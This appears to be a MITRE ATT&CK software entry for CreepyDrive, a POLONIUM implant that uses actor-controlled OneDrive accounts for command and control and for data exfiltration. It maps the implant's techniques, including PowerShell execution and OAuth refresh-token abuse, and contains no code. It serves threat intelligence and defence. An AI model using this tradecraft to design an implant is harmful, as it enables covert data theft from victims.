CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[1]

ID: S1023
Platforms: Windows, Office 365
Version: 1.0
Created: 07 July 2022
Last Modified: 10 August 2022

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.[1]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

CreepyDrive can use Powershell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.[1]

Enterprise T1005 Data from Local System

CreepyDrive can upload files to C2 from victim machines.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

CreepyDrive can use cloud services including OneDrive for data exfiltration.[1]

Enterprise T1083 File and Directory Discovery

CreepyDrive can specify the local file path to upload files from.[1]

Enterprise T1105 Ingress Tool Transfer

CreepyDrive can download files to the compromised host.[1]

Enterprise T1550 .001 Use Alternate Authentication Material: Application Access Token

CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.[1]

Enterprise T1102 .002 Web Service: Bidirectional Communication

CreepyDrive can use OneDrive for C2.[1]

Groups That Use This Software

ID Name References